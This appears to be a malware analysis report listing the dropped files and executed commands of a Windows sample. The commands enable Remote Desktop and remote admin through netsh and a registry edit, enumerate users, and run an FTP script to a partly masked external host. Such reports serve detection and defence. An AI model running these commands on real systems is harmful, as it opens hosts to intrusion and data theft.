Technical Information
- '<SYSTEM32>\netsh.exe' firewall set service remoteadmin enable
- '<SYSTEM32>\netsh.exe' firewall set service remotedesktop enable
- C:\krypton.exe
- C:\stels setup.vbs
- C:\lana.jpg
- %TEMP%\8ecf.tmp\8f3e.tmp\8f3f.bat
- C:\ebt.txt
- C:\egt.txt
- C:\script.bat
- 'ft###.#itroflare.com':21
- DNS ASK ft###.#itroflare.com
- ClassName: 'EDIT' WindowName: ''
- 'C:\krypton.exe'
- 'C:\krypton.exe' ' (with hidden window)
- '%WINDIR%\syswow64\wscript.exe' "C:\STELS SETUP.VBS"
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\8ECF.tmp\8F3E.tmp\8F3F.bat C:\Krypton.exe"
- '<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net.exe' users
- '<SYSTEM32>\net1.exe' users
- '<SYSTEM32>\ipconfig.exe'
- '<SYSTEM32>\ftp.exe' -s:script.bat -nd
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "<SYSTEM32>\ftp.exe"